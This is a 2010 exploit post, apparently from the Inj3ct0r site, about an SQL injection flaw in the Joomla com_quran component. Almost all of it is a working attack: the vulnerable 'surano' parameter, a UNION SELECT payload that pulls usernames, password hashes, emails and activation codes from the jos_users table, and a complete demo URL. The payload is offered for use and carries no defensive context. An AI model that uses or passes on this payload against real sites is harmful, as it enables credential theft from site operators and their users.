Joomla com_quran SQL Injection vulnerability
Posted on 30 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla com_quran SQL Injection vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ Joomla com_quran SQL Injection vulnerability ============================================ [!] ===========================================================================[!] [~] Joomla com_quran SQL Injection vulnerability [~] Author : r3m1ck (mick.emo.boy@yahoo.com) [~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us [~] Date : 31 May, 2010 [~] location : Indonesia [~] Software download : http://muslimonline.org/forum/index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2 [!]===========================================================================[!] [ Vulnerable File ] http://site/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER] [ XpL ] -69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a, activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users-- or another columns [ d3m0 ] http://site/joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a, activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users-- etc etc etc ;] [!]===========================================================================[!] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>